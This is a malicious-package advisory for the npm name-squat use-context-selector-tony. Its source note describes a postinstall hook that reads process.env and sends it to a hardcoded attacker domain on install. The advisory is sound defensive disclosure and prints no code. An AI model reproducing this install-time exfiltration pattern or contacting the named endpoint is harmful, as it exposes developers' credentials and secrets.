—

MAL-2026-4698

Malicious code in use-context-selector-tony (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6dde262b1fecc08fe5853c4ec7ada6c3c3746a6e7afb5bd18c33d5adfa03843c) This package is a name-squat of the popular `use-context-selector` library and ships a postinstall script (`dist/postinstall.js` / `src/postinstall.js`) that, on `npm install`, reads `process.env` and beacons to the hardcoded endpoint `https://almondco.online` via `https.get`. The endpoint is unrelated to any published `use-context-selector` author or infrastructure and is hardcoded in the install-lifecycle script. The combination of (a) name confusion against an established library, (b) a `postinstall` hook firing without consent on every `npm install`, (c) reads of `process.env`, and (d) outbound HTTPS to an attacker-controlled domain matches the standard install-time environment-exfiltration pattern.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / use-context-selector-tony

No fixed version published yet for use-context-selector-tony (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/use-context-selector-tony/v/2.0.5 [PACKAGE]